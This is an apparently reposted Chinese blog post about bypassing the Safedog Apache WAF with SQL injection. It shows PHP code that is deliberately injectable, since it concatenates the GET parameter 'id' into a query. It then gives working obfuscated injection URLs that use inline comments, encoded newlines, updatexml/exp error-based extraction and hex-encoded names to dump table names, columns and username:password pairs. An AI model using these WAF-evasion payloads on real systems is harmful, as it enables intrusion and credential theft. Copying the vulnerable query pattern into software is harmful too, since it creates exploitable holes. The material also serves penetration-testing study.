【waf绕过】某狗apache SQL注入绕过
2022-12-22 19:9:31 Author: moonsec(查看原文) 阅读量:30 收藏

大家好又是俺,暗月大徒弟,跟暗月大师傅苦学了半年,保持天天学习,顺便做点记录什么的。

最近在渗透测试中遇到一个apache php 安全dog的注入点,本地搭建了一下 绕过一下这样子。

安全狗版本apache v4.0

注入点代码

<?php

$conn=mysqli_connect("localhost","root","root","www_test1_com");

if($conn->connect_error){
die("连接数据库失败".$conn->connect_error);
}

$conn->query('set names utf8');
$id=$_GET['id'];
echo "select * from users where id='$id'";
echo "<br>";

if(!$result=$conn->query("select * from users where id='$id'")){

die(mysqli_error($conn));
}

while($row=$result->fetch_assoc()){
echo "<pre>";
var_dump($row);
echo "</pre>";
}

?>

获取库名

http://www.test1.com/index.php?id=' and exp(~(select*from(select info() )x))or '

列表

将库名用hex()转成十六进制

http://www.test1.com/index.php?id='union/*/!*!**/select 1,2,updatexml/*!--+/*%0A(1,concat(0x7e,(SELECT group_concat(table_name)from/*!--+/*%0Ainformation_schema.tables*/where table_schema=0x7777775F74657374315F636F6D),0x7e),1)or '

列字段

http://www.test1.com/index.php?id=1 'union/*/!*!**/select 1,2,/*/!*!**/ updatexml/*!--+/*%0a(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='users' limit 0,1),0x7e),1)*/or%20'

字段长度限制了 分段获取

http://www.test1.com/index.php?id=1 'union/*/!*!**/select 1,2,/*/!*!**/ updatexml/*!--+/*%0a(1,concat(0x7e,(select SUBSTRING(group_concat(column_name),40,60)from information_schema.columns where table_name=0x7573657273  limit 0,1),0x7e),1)*/or%20'

查内容

http://www.test1.com/index.php?id=1 'union/*/!*!**/select 1,2,/*/!*!**/ updatexml/*!--+/*%0a(1,concat(0x7e,(select group_concat(username,0x3a,password)from users limit 0,1),0x7e),1)*/or%20'

长期更新渗透测试、WEB安全、代码审计、红蓝对抗等安全技术


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653586257&idx=1&sn=22ba426953f02000f9f93ea285b08a6a&chksm=811b9513b66c1c05e05b9d149522e5138187dd213b1f4778e54f59bb21d4f8a6e379c271a2cd#rd
如有侵权请联系:admin#unsafe.sh